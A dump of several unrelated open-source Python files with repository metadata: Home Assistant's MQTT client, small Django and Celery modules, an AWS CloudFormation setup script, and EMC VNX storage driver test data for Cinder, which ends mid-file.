# pylint: disable=too-few-public-methods
class _JsonFmtParser(object):
""" Implements a json parser on xpath. """
def __init__(self, jsonpath):
import jsonpath_rw
self._expr = jsonpath_rw.parse(jsonpath)
def __call__(self, payload):
match = self._expr.find(json.loads(payload))
return match[0].value if len(match) > 0 else payload
# pylint: disable=too-few-public-methods
class FmtParser(object):
""" Wrapper for all supported formats. """
def __init__(self, fmt):
self._parse = lambda x: x
if fmt:
if fmt.startswith('json:'):
self._parse = _JsonFmtParser(fmt[5:])
def __call__(self, payload):
return self._parse(payload)
# This is based on one of the paho-mqtt examples:
# http://git.eclipse.org/c/paho/org.eclipse.paho.mqtt.python.git/tree/examples/sub-class.py
# pylint: disable=too-many-arguments
class MQTT(object):
""" Implements messaging service for MQTT. """
def __init__(self, hass, broker, port, client_id, keepalive, username,
password, certificate):
import paho.mqtt.client as mqtt
self.userdata = {
'hass': hass,
'topics': {},
'progress': {},
}
if client_id is None:
self._mqttc = mqtt.Client()
else:
self._mqttc = mqtt.Client(client_id)
self._mqttc.user_data_set(self.userdata)
if username is not None:
self._mqttc.username_pw_set(username, password)
if certificate is not None:
self._mqttc.tls_set(certificate)
self._mqttc.on_subscribe = _mqtt_on_subscribe
self._mqttc.on_unsubscribe = _mqtt_on_unsubscribe
self._mqttc.on_connect = _mqtt_on_connect
self._mqttc.on_disconnect = _mqtt_on_disconnect
self._mqttc.on_message = _mqtt_on_message
self._mqttc.connect(broker, port, keepalive)
def publish(self, topic, payload, qos):
""" Publish a MQTT message. """
self._mqttc.publish(topic, payload, qos)
def start(self):
""" Run the MQTT client. """
self._mqttc.loop_start()
def stop(self):
""" Stop the MQTT client. """
self._mqttc.loop_stop()
def subscribe(self, topic, qos):
""" Subscribe to a topic. """
if topic in self.userdata['topics']:
return
result, mid = self._mqttc.subscribe(topic, qos)
_raise_on_error(result)
self.userdata['progress'][mid] = topic
self.userdata['topics'][topic] = None
def unsubscribe(self, topic):
""" Unsubscribe from topic. """
result, mid = self._mqttc.unsubscribe(topic)
_raise_on_error(result)
self.userdata['progress'][mid] = topic
def _mqtt_on_message(mqttc, userdata, msg):
""" Message callback """
userdata['hass'].bus.fire(EVENT_MQTT_MESSAGE_RECEIVED, {
ATTR_TOPIC: msg.topic,
ATTR_QOS: msg.qos,
ATTR_PAYLOAD: msg.payload.decode('utf-8'),
})
def _mqtt_on_connect(mqttc, userdata, flags, result_code):
""" On connect, resubscribe to all topics we were subscribed to. """
if result_code != 0:
_LOGGER.error('Unable to connect to the MQTT broker: %s', {
1: 'Incorrect protocol version',
2: 'Invalid client identifier',
3: 'Server unavailable',
4: 'Bad username or password',
5: 'Not authorised'
}.get(result_code, 'Unknown reason'))
mqttc.disconnect()
return
old_topics = userdata['topics']
userdata['topics'] = {}
userdata['progress'] = {}
for topic, qos in old_topics.items():
# qos is None if we were in process of subscribing
if qos is not None:
mqttc.subscribe(topic, qos)
def _mqtt_on_subscribe(mqttc, userdata, mid, granted_qos):
""" Called when subscribe successful. """
topic = userdata['progress'].pop(mid, None)
if topic is None:
return
userdata['topics'][topic] = granted_qos
def _mqtt_on_unsubscribe(mqttc, userdata, mid, granted_qos):
""" Called when subscribe successful. """
topic = userdata['progress'].pop(mid, None)
if topic is None:
return
userdata['topics'].pop(topic, None)
def _mqtt_on_disconnect(mqttc, userdata, result_code):
""" Called when being disconnected. """
# When disconnected because of calling disconnect()
if result_code == 0:
return
tries = 0
wait_time = 0
while True:
try:
if mqttc.reconnect() == 0:
_LOGGER.info('Successfully reconnected to the MQTT server')
break
except socket.error:
pass
wait_time = min(2**tries, MAX_RECONNECT_WAIT)
_LOGGER.warning(
'Disconnected from MQTT (%s). Trying to reconnect in %ss',
result_code, wait_time)
# It is ok to sleep here as we are in the MQTT thread.
time.sleep(wait_time)
tries += 1
def _raise_on_error(result):
""" Raise error if error result. """
if result != 0:
raise HomeAssistantError('Error talking to MQTT: {}'.format(result))
def _match_topic(subscription, topic):
""" Returns if topic matches subscription. """
if subscription.endswith('#'):
return (subscription[:-2] == topic or
topic.startswith(subscription[:-1]))
sub_parts = subscription.split('/')
topic_parts = topic.split('/')
return (len(sub_parts) == len(topic_parts) and
all(a == b for a, b in zip(sub_parts, topic_parts) if a != '+'))
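# A few informal checks of the matching rules implemented above (a sketch, not
# a test suite): '#' matches all remaining levels, '+' matches exactly one.
assert _match_topic('home/#', 'home/kitchen/light')
assert _match_topic('home/#', 'home')
assert _match_topic('home/+/light', 'home/kitchen/light')
assert not _match_topic('home/+/light', 'home/kitchen/lamp/light')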
|
badele/home-assistant
|
homeassistant/components/mqtt/__init__.py
|
Python
|
mit
| 9,508 | 0 |
"""
Empty
"""
|
fallisd/validate
|
unittests/__init__.py
|
Python
|
gpl-2.0
| 14 | 0 |
from __future__ import absolute_import
from celery import shared_task
import praw
from .commonTasks import *
from .models import Redditor, RedditorStatus, Status
@shared_task
def test(param):
return 'The test task executed with argument "%s" ' % param
@shared_task
def update_user(redditor):
update_user_status(redditor, 10)
get_submissions(redditor)
update_user_status(redditor, 20)
get_comments(redditor)
update_user_status(redditor, 30)
@shared_task
def write_user(user):
create_user(user)
|
a-harper/RedditorProfiler
|
tasks.py
|
Python
|
gpl-3.0
| 532 | 0.00188 |
"""
WSGI config for spendrbackend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spendrbackend.settings")
application = get_wsgi_application()
|
sawmurai/spendrbackend
|
spendrbackend/wsgi.py
|
Python
|
apache-2.0
| 404 | 0 |
import os
import sys
path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0, path)
|
phha/taskwiki
|
tests/__init__.py
|
Python
|
mit
| 115 | 0 |
# Created By: Virgil Dupras
# Created On: 2010-02-05
# Copyright 2015 Hardcoded Software (http://www.hardcoded.net)
#
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog
from .details_table import DetailsModel
class DetailsDialog(QDialog):
def __init__(self, parent, app, **kwargs):
super().__init__(parent, Qt.Tool, **kwargs)
self.app = app
self.model = app.model.details_panel
self._setupUi()
# To avoid saving uninitialized geometry on appWillSavePrefs, we track whether our dialog
# has been shown. If it has, we know that our geometry should be saved.
self._shown_once = False
self.app.prefs.restoreGeometry('DetailsWindowRect', self)
self.tableModel = DetailsModel(self.model)
# tableView is defined in subclasses
self.tableView.setModel(self.tableModel)
self.model.view = self
self.app.willSavePrefs.connect(self.appWillSavePrefs)
def _setupUi(self): # Virtual
pass
def show(self):
self._shown_once = True
super().show()
#--- Events
def appWillSavePrefs(self):
if self._shown_once:
self.app.prefs.saveGeometry('DetailsWindowRect', self)
#--- model --> view
def refresh(self):
self.tableModel.beginResetModel()
self.tableModel.endResetModel()
|
stuckj/dupeguru
|
qt/base/details_dialog.py
|
Python
|
gpl-3.0
| 1,600 | 0.00875 |
#!/usr/bin/env python
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
call_command(
'dumpdata',
"waffle.flag",
indent=4,
use_natural_foreign_keys=True,
use_natural_primary_keys=True,
output='base/fixtures/waffle_flags.json'
)
|
uclouvain/OSIS-Louvain
|
base/management/commands/dump_waffle_flags.py
|
Python
|
agpl-3.0
| 436 | 0 |
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
|
warriorframework/warriorframework
|
warrior/WarriorCore/__init__.py
|
Python
|
apache-2.0
| 581 | 0.001721 |
from pprint import pprint
from amazon_cf import Environment
from amazon_client import Cloudformation
from helper import (
Listener,
SecurityGroupRules,
UserPolicy,
get_my_ip,
get_local_variables,
convert_to_aws_list,
ContainerDefinition
)
if __name__ == "__main__":
# Manually created items and constants
key_name = 'id_rsa'
filename = 'file.json'
stack_name = 'dev'
server_size = "t2.micro"
ami = "ami-64385917"
app_container = "martyni/app"
nginx_container = "martyni/nginx"
domain = "martyni.co.uk."
ssl_cert = "arn:aws:acm:eu-west-1:526914317097:certificate/c162e6f8-3f40-4468-a03f-03f5c8d8ee63"
container_size = 450
environment_variables = [
"AWS_DEFAULT_PROFILE",
"MAIL_USERNAME",
"MAIL_PASSWORD",
"MAIL_DEFAULT_SENDER",
"MAIL_SERVER",
"MAIL_PORT",
"MAIL_USE_SSL"
]
# Container configuration
app_container = {
"Name": "app",
"Image": app_container,
"Cpu": container_size,
"Memory": container_size,
"Environment": get_local_variables(environment_variables),
"Essential": True
}
nginx_container = {
"Name": "nginx",
"Image": nginx_container,
"Cpu": container_size,
"PortMappings": [
{
"Protocol": "tcp",
"ContainerPort": 80,
"HostPort": 80
}
],
"Memory": container_size,
"Environment": convert_to_aws_list(SITE=stack_name + "." + domain[:-1:]),
"Links": ["app"],
"Essential": True
}
# Healthcheck config
healthcheck = {
"HealthyThreshold": 2,
"Interval": 10,
"Target": "HTTP:80/",
"Timeout": 5,
"UnhealthyThreshold": 10
}
my_ip = get_my_ip()
my_env = Environment('my_env')
my_env.add_vpc("VPC")
my_env.add_subnet("My first subnet", AvailabilityZone={
"Fn::Select": ["1", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_subnet("My second subnet", AvailabilityZone={
"Fn::Select": ["2", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_subnet("My third subnet", AvailabilityZone={
"Fn::Select": ["0", {"Fn::GetAZs": {"Ref": "AWS::Region"}}]})
my_env.add_internet_gateway("internet gateway")
my_env.attach_internet_gateway("Attach gateway")
my_env.add_route_table("My default route table")
my_env.add_default_internet_route("To the internet")
my_env.add_subnet_to_route_table("add first subnet")
my_env.add_subnet_to_route_table(
"add second subnet", subnet="MySecondSubnet")
my_env.add_subnet_to_route_table(
"add third subnet", subnet="MyThirdSubnet")
in_rules = SecurityGroupRules("SecurityGroupIngress")
in_rules.add_rule("tcp", from_port=22, to_port=22, cidr_ip=my_ip)
in_rules.add_rule("tcp", from_port=443, to_port=443, cidr_ip="0.0.0.0/0",)
in_rules.add_rule("tcp", from_port=80, to_port=80, cidr_ip="0.0.0.0/0",)
out_rules = SecurityGroupRules("SecurityGroupEgress")
out_rules.add_rule("-1", cidr_ip="0.0.0.0/0")
my_env.add_security_group(
"My security group", in_rules.rules, out_rules.rules)
docker_user = UserPolicy("docker")
docker_user.add_statement([
"ecr:*",
"ecs:CreateCluster",
"ecs:DeregisterContainerInstance",
"ecs:DiscoverPollEndpoint",
"ecs:Poll",
"ecs:RegisterContainerInstance",
"ecs:StartTelemetrySession",
"ecs:Submit*",
"logs:CreateLogStream",
"logs:PutLogEvents"
])
my_env.add_role(stack_name + "role", Policies=docker_user.policies)
my_env.add_instance_profile("My profile")
my_env.add_launch_configuration(
"my launch configuration",
ami,
server_size,
KeyName=key_name,
AssociatePublicIpAddress=True,
IamInstanceProfile=my_env.cf_ref("MyProfile")
)
l_443 = Listener(
443,
80,
lb_protocol="HTTPS",
inst_protocol="HTTP",
ssl_certificate_id=ssl_cert
)
my_env.add_loadbalancer(
"My Load Balancer",
[l_443.get_listener()],
HealthCheck=healthcheck)
my_env.add_autoscaling_group("My Autoscaling Group", DesiredCapacity="1", LoadBalancerNames=[
my_env.cf_ref("MyLoadBalancer")])
app_container = ContainerDefinition(**app_container)
nginx_container = ContainerDefinition(**nginx_container)
my_env.add_ecs_task('web service',
container_definitions=[
app_container.return_container(),
nginx_container.return_container()
]
)
my_env.add_ecs_service('web service running')
resource_record = [my_env.cf_get_at("MyLoadBalancer", "DNSName")]
my_env.add_record_set(
stack_name + "." + domain,
_type="CNAME",
depends=["MyLoadBalancer"],
HostedZoneName=domain,
TTL="300",
ResourceRecords=resource_record
)
# Launch stack
pprint(my_env.show_resources())
my_env.write_resources(filename)
my_client = Cloudformation(stack_name, filename)
my_client.create_stack()
|
martyni/amazon
|
my_env.py
|
Python
|
mit
| 5,433 | 0.001104 |
from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
from finance.models import Payment
from .models import BookingVehicle
@receiver([post_save, post_delete], sender=Payment)
def update_booking_payment_info(sender, instance, **kwargs):
if instance.item_content_type.app_label == 'opencabs' and \
instance.item_content_type.model == 'booking':
if instance.item_object:
instance.item_object.save()
@receiver([post_save, post_delete], sender=BookingVehicle)
def update_booking_drivers(sender, instance, **kwargs):
instance.booking.update_drivers()
|
rtnpro/opencabs
|
opencabs/signals.py
|
Python
|
gpl-3.0
| 635 | 0 |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
class QualityMeeting(Document):
pass
|
Zlash65/erpnext
|
erpnext/quality_management/doctype/quality_meeting/quality_meeting.py
|
Python
|
gpl-3.0
| 242 | 0.012397 |
# Copyright (c) 2012 - 2014 EMC Corporation, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import mock
from oslo_concurrency import processutils
from cinder import exception
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.emc.emc_cli_fc import EMCCLIFCDriver
from cinder.volume.drivers.emc.emc_cli_iscsi import EMCCLIISCSIDriver
import cinder.volume.drivers.emc.emc_vnx_cli as emc_vnx_cli
from cinder.volume.drivers.emc.emc_vnx_cli import CommandLineHelper
from cinder.volume.drivers.emc.emc_vnx_cli import EMCVnxCLICmdError
from cinder.volume import volume_types
from cinder.zonemanager.fc_san_lookup_service import FCSanLookupService
SUCCEED = ("", 0)
FAKE_ERROR_RETURN = ("FAKE ERROR", 255)
class EMCVNXCLIDriverTestData():
test_volume = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_clone_cg = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_cg = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': 'cg_id',
'volume_admin_metadata': [{'key': 'readonly', 'value': 'True'}]
}
test_volume_rw = {
'name': 'vol1',
'size': 1,
'volume_name': 'vol1',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol1',
'display_description': 'test volume',
'volume_type_id': None,
'consistencygroup_id': None,
'volume_admin_metadata': [{'key': 'attached_mode', 'value': 'rw'},
{'key': 'readonly', 'value': 'False'}]
}
test_volume2 = {
'name': 'vol2',
'size': 1,
'volume_name': 'vol2',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol2',
'consistencygroup_id': None,
'display_description': 'test volume',
'volume_type_id': None}
volume_in_cg = {
'name': 'vol2',
'size': 1,
'volume_name': 'vol2',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'vol2',
'consistencygroup_id': None,
'display_description': 'test volume',
'volume_type_id': None}
test_volume_with_type = {
'name': 'vol_with_type',
'size': 1,
'volume_name': 'vol_with_type',
'id': '1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'thin_vol',
'consistencygroup_id': None,
'display_description': 'vol with type',
'volume_type_id': 'abc1-2320-9013-8813-8941-1374-8112-1231'}
test_failed_volume = {
'name': 'failed_vol1',
'size': 1,
'volume_name': 'failed_vol1',
'id': '4',
'provider_auth': None,
'project_id': 'project',
'display_name': 'failed_vol',
'consistencygroup_id': None,
'display_description': 'test failed volume',
'volume_type_id': None}
test_snapshot = {
'name': 'snapshot1',
'size': 1,
'id': '4444',
'volume_name': 'vol1',
'volume_size': 1,
'consistencygroup_id': None,
'cgsnapshot_id': None,
'project_id': 'project'}
test_failed_snapshot = {
'name': 'failed_snapshot',
'size': 1,
'id': '5555',
'volume_name': 'vol-vol1',
'volume_size': 1,
'project_id': 'project'}
test_clone = {
'name': 'clone1',
'size': 1,
'id': '2',
'volume_name': 'vol1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'clone1',
'consistencygroup_id': None,
'display_description': 'volume created from snapshot',
'volume_type_id': None}
test_clone_cg = {
'name': 'clone1',
'size': 1,
'id': '2',
'volume_name': 'vol1',
'provider_auth': None,
'project_id': 'project',
'display_name': 'clone1',
'consistencygroup_id': 'consistencygroup_id',
'display_description': 'volume created from snapshot',
'volume_type_id': None}
connector = {
'ip': '10.0.0.2',
'initiator': 'iqn.1993-08.org.debian:01:222',
'wwpns': ["1234567890123456", "1234567890543216"],
'wwnns': ["2234567890123456", "2234567890543216"],
'host': 'fakehost'}
test_volume3 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce24',
'name': 'vol3',
'size': 2,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location': None,
'host': 'ubuntu-server12@pool_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test02', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'attached_host': None,
'_name_id': None, 'volume_metadata': []}
test_new_type = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:provisioning': 'thin'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
test_diff = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:provisioning': ('thick', 'thin')}}
test_host = {'host': 'ubuntu-server12@pool_backend_1',
'capabilities':
{'location_info': 'POOL_SAS1|FNM00124500890',
'volume_backend_name': 'pool_backend_1',
'storage_protocol': 'iSCSI'}}
test_volume4 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce24',
'name': 'vol4',
'size': 2L,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location': None,
'host': 'ubuntu-server12@array_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test02', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'_name_id': None, 'volume_metadata': []}
test_volume5 = {'migration_status': None, 'availability_zone': 'nova',
'id': '1181d1b2-cea3-4f55-8fa8-3360d026ce25',
'name_id': '1181d1b2-cea3-4f55-8fa8-3360d026ce25',
'name': 'vol5',
'size': 1,
'volume_admin_metadata': [],
'status': 'available',
'volume_type_id':
'19fdd0dd-03b3-4d7c-b541-f4df46f308c8',
'deleted': False, 'provider_location':
'system^FNM11111|type^lun|lun_id^5',
'host': 'ubuntu-server12@array_backend_1',
'source_volid': None, 'provider_auth': None,
'display_name': 'vol-test05', 'instance_uuid': None,
'attach_status': 'detached',
'volume_type': [],
'_name_id': None, 'volume_metadata': []}
test_new_type2 = {'name': 'voltype0', 'qos_specs_id': None,
'deleted': False,
'extra_specs': {'storagetype:pool': 'POOL_SAS2'},
'id': 'f82f28c8-148b-416e-b1ae-32d3c02556c0'}
test_diff2 = {'encryption': {}, 'qos_specs': {},
'extra_specs':
{'storagetype:pool': ('POOL_SAS1', 'POOL_SAS2')}}
test_host2 = {'host': 'ubuntu-server12@array_backend_1',
'capabilities':
{'location_info': '|FNM00124500890',
'volume_backend_name': 'array_backend_1',
'storage_protocol': 'iSCSI'}}
test_cg = {'id': 'consistencygroup_id',
'name': 'group_name',
'status': 'deleting'}
test_cgsnapshot = {
'consistencygroup_id': 'consistencygroup_id',
'id': 'cgsnapshot_id',
'status': 'available'}
test_member_cgsnapshot = {
'name': 'snapshot1',
'size': 1,
'id': 'cgsnapshot_id',
'volume_name': 'vol1',
'volume_size': 1,
'consistencygroup_id': 'consistencygroup_id',
'cgsnapshot_id': 'cgsnapshot_id',
'project_id': 'project'
}
test_lun_id = 1
test_existing_ref = {'id': test_lun_id}
test_pool_name = 'Pool_02_SASFLASH'
device_map = {
'1122334455667788': {
'initiator_port_wwn_list': ['123456789012345', '123456789054321'],
'target_port_wwn_list': ['1122334455667777']}}
i_t_map = {'123456789012345': ['1122334455667777'],
'123456789054321': ['1122334455667777']}
POOL_PROPERTY_CMD = ('storagepool', '-list', '-name', 'unit_test_pool',
'-userCap', '-availableCap')
NDU_LIST_CMD = ('ndu', '-list')
NDU_LIST_RESULT = ("Name of the software package: -Compression " +
"Name of the software package: -Deduplication " +
"Name of the software package: -FAST " +
"Name of the software package: -FASTCache " +
"Name of the software package: -ThinProvisioning ",
0)
def SNAP_MP_CREATE_CMD(self, name='vol1', source='vol1'):
return ('lun', '-create', '-type', 'snap', '-primaryLunName',
source, '-name', name)
def SNAP_ATTACH_CMD(self, name='vol1', snapName='snapshot1'):
return ('lun', '-attach', '-name', name, '-snapName', snapName)
def SNAP_DELETE_CMD(self, name):
return ('snap', '-destroy', '-id', name, '-o')
def SNAP_CREATE_CMD(self, name):
return ('snap', '-create', '-res', 1, '-name', name,
'-allowReadWrite', 'yes',
'-allowAutoDelete', 'no')
def LUN_DELETE_CMD(self, name):
return ('lun', '-destroy', '-name', name, '-forceDetach', '-o')
def LUN_CREATE_CMD(self, name, isthin=False):
return ('lun', '-create', '-type', 'Thin' if isthin else 'NonThin',
'-capacity', 1, '-sq', 'gb', '-poolName',
'unit_test_pool', '-name', name)
def LUN_EXTEND_CMD(self, name, newsize):
return ('lun', '-expand', '-name', name, '-capacity', newsize,
'-sq', 'gb', '-o', '-ignoreThresholds')
def LUN_PROPERTY_ALL_CMD(self, lunname):
return ('lun', '-list', '-name', lunname,
'-state', '-status', '-opDetails', '-userCap', '-owner',
'-attachedSnapshot')
def MIGRATION_CMD(self, src_id=1, dest_id=1):
return ("migrate", "-start", "-source", src_id, "-dest", dest_id,
"-rate", "high", "-o")
def MIGRATION_VERIFY_CMD(self, src_id):
return ("migrate", "-list", "-source", src_id)
def GETPORT_CMD(self):
return ("connection", "-getport", "-address", "-vlanid")
def PINGNODE_CMD(self, sp, portid, vportid, ip):
return ("connection", "-pingnode", "-sp", sp, '-portid', portid,
"-vportid", vportid, "-address", ip)
def GETFCPORT_CMD(self):
return ('port', '-list', '-sp')
def CONNECTHOST_CMD(self, hostname, gname):
return ('storagegroup', '-connecthost',
'-host', hostname, '-gname', gname, '-o')
def ENABLE_COMPRESSION_CMD(self, lun_id):
return ('compression', '-on',
'-l', lun_id, '-ignoreThresholds', '-o')
provisioning_values = {
'thin': ['-type', 'Thin'],
'thick': ['-type', 'NonThin'],
'compressed': ['-type', 'Thin'],
'deduplicated': ['-type', 'Thin', '-deduplication', 'on']}
tiering_values = {
'starthighthenauto': [
'-initialTier', 'highestAvailable',
'-tieringPolicy', 'autoTier'],
'auto': [
'-initialTier', 'optimizePool',
'-tieringPolicy', 'autoTier'],
'highestavailable': [
'-initialTier', 'highestAvailable',
'-tieringPolicy', 'highestAvailable'],
'lowestavailable': [
'-initialTier', 'lowestAvailable',
'-tieringPolicy', 'lowestAvailable'],
'nomovement': [
'-initialTier', 'optimizePool',
'-tieringPolicy', 'noMovement']}
def LUN_CREATION_CMD(self, name, size, pool, provisioning, tiering):
initial = ['lun', '-create',
'-capacity', size,
'-sq', 'gb',
'-poolName', pool,
'-name', name]
if provisioning:
initial.extend(self.provisioning_values[provisioning])
else:
initial.extend(self.provisioning_values['thick'])
if tiering:
initial.extend(self.tiering_values[tiering])
return tuple(initial)
def CHECK_FASTCACHE_CMD(self, storage_pool):
return ('-np', 'storagepool', '-list', '-name',
storage_pool, '-fastcache')
def CREATE_CONSISTENCYGROUP_CMD(self, cg_name):
return ('-np', 'snap', '-group', '-create',
'-name', cg_name, '-allowSnapAutoDelete', 'no')
def DELETE_CONSISTENCYGROUP_CMD(self, cg_name):
return ('-np', 'snap', '-group', '-destroy',
'-id', cg_name)
def GET_CONSISTENCYGROUP_BY_NAME(self, cg_name):
return ('snap', '-group', '-list', '-id', cg_name)
def ADD_LUN_TO_CG_CMD(self, cg_name, lun_id):
return ('-np', 'snap', '-group',
'-addmember', '-id', cg_name, '-res', lun_id)
def CREATE_CG_SNAPSHOT(self, cg_name, snap_name):
return ('-np', 'snap', '-create', '-res', cg_name,
'-resType', 'CG', '-name', snap_name, '-allowReadWrite',
'yes', '-allowAutoDelete', 'no')
def DELETE_CG_SNAPSHOT(self, snap_name):
return ('-np', 'snap', '-destroy', '-id', snap_name, '-o')
def GET_CG_BY_NAME_CMD(self, cg_name):
return ('snap', '-group', '-list', '-id', cg_name)
def CONSISTENCY_GROUP_VOLUMES(self):
volumes = []
volumes.append(self.test_volume)
volumes.append(self.test_volume)
return volumes
def SNAPS_IN_SNAP_GROUP(self):
snaps = []
snaps.append(self.test_snapshot)
snaps.append(self.test_snapshot)
return snaps
def CG_PROPERTY(self, cg_name):
return """
Name: %(cg_name)s
Description:
Allow auto delete: No
Member LUN ID(s): 1, 3
State: Ready
""" % {'cg_name': cg_name}
POOL_PROPERTY = ("""\
Pool Name: unit_test_pool
Pool ID: 1
User Capacity (Blocks): 5769501696
User Capacity (GBs): 10000.5
Available Capacity (Blocks): 5676521472
Available Capacity (GBs): 1000.6
""", 0)
ALL_PORTS = ("SP: A\n" +
"Port ID: 4\n" +
"Port WWN: iqn.1992-04.com.emc:cx.fnm00124000215.a4\n" +
"iSCSI Alias: 0215.a4\n\n" +
"Virtual Port ID: 0\n" +
"VLAN ID: Disabled\n" +
"IP Address: 10.244.214.118\n\n" +
"SP: A\n" +
"Port ID: 5\n" +
"Port WWN: iqn.1992-04.com.emc:cx.fnm00124000215.a5\n" +
"iSCSI Alias: 0215.a5\n", 0)
iscsi_connection_info_ro = \
{'data': {'access_mode': 'ro',
'target_discovered': True,
'target_iqn':
'iqn.1992-04.com.emc:cx.fnm00124000215.a4',
'target_lun': 1,
'target_portal': '10.244.214.118:3260'},
'driver_volume_type': 'iscsi'}
iscsi_connection_info_rw = \
{'data': {'access_mode': 'rw',
'target_discovered': True,
'target_iqn':
'iqn.1992-04.com.emc:cx.fnm00124000215.a4',
'target_lun': 1,
'target_portal': '10.244.214.118:3260'},
'driver_volume_type': 'iscsi'}
PING_OK = ("Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n" +
"Reply from 10.0.0.2: bytes=32 time=1ms TTL=30\n", 0)
FC_PORTS = ("Information about each SPPORT:\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 0\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:60:08:60:01:95\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: YES\n" +
"Switch UID: 10:00:00:05:1E:72:EC:A6:" +
"20:46:00:05:1E:72:EC:A6\n" +
"SP Source ID: 272896\n" +
"\n" +
"SP Name: SP B\n" +
"SP Port ID: 4\n" +
"SP UID: iqn.1992-04.com.emc:cx." +
"fnm00124000215.b4\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: Not Applicable\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 2\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:62:08:60:01:95\n" +
"Link Status: Down\n" +
"Port Status: Online\n" +
"Switch Present: NO\n", 0)
FAKEHOST_PORTS = (
"Information about each HBA:\n" +
"\n" +
"HBA UID: 20:00:00:90:FA:53:46:41:12:34:" +
"56:78:90:12:34:56\n" +
"Server Name: fakehost\n" +
"Server IP Address: 10.0.0.2" +
"HBA Model Description:\n" +
"HBA Vendor Description:\n" +
"HBA Device Driver Name:\n" +
"Information about each port of this HBA:\n\n" +
" SP Name: SP A\n" +
" SP Port ID: 0\n" +
" HBA Devicename:\n" +
" Trusted: NO\n" +
" Logged In: YES\n" +
" Defined: YES\n" +
" Initiator Type: 3\n" +
" StorageGroup Name: fakehost\n\n" +
" SP Name: SP A\n" +
" SP Port ID: 2\n" +
" HBA Devicename:\n" +
" Trusted: NO\n" +
" Logged In: YES\n" +
" Defined: YES\n" +
" Initiator Type: 3\n" +
" StorageGroup Name: fakehost\n\n" +
"Information about each SPPORT:\n" +
"\n" +
"SP Name: SP A\n" +
"SP Port ID: 0\n" +
"SP UID: 50:06:01:60:88:60:01:95:" +
"50:06:01:60:08:60:01:95\n" +
"Link Status: Up\n" +
"Port Status: Online\n" +
"Switch Present: YES\n" +
"Switch UID: 10:00:00:05:1E:72:EC:A6:" +
"20:46:00:05:1E:72:EC:A6\n" +
"SP Source ID: 272896\n" +
"\n" +
"SP Name: SP B\n" +
